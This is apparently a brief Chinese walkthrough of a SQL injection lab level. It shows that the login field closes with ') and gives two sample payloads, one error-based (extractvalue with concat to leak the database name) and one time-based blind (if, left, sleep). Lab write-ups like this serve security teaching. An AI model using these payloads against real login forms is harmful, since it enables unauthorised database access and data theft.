通过报错可知 是通过') 闭合的
发现没有登入成功返回信息 ,看来是要盲注了。
方法一,报错型
既然它返回错误信息了,说明有回显,可以报错注入。
样例payload
uname=admin') and extractvalue(1,concat(0x7e,(select database()))) and ('
在concat()中构造查询语句,完事,和less-12以及之前的报错型注入一样,不再赘述。
方法二,时间型盲注
因为可以报错注入,这个方法没有回显,就有点鸡肋了,给个样例payload:
uname=admin') and if(left(database(),1)='s',sleep(3),1) --+&passwd=admin&submit=Submit
这就又和之前的一样了。
如有还不懂得
就到这里学习吧